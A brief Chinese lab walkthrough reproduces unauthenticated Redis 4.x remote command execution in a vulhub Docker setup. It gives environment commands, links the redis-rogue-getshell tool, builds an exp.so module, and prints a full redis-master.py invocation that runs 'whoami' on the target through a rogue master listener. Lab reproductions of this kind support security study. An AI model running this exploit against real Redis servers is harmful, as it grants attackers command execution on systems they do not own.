环境搭建

cd vulhub/redis/4-unacc
docker-compose up -d

漏洞复现

检测

redis-cli -h ip

使用redis工具

工具地址：https://github.com/vulhub/redis-rogue-getshell

下载完成后，先进入RedisModulesSDK/exp/ 目录进行make操作

获得exp.so后可以进行命令执行

cd回redis-rogue-getshell-master/路径

命令执行

whoami

python3 redis-master.py -r 192.168.41.130 -p 6379 -L 192.168.41.130 -P 8888 -f RedisModulesSDK/exp/exp.so -c "whoami"

uname -a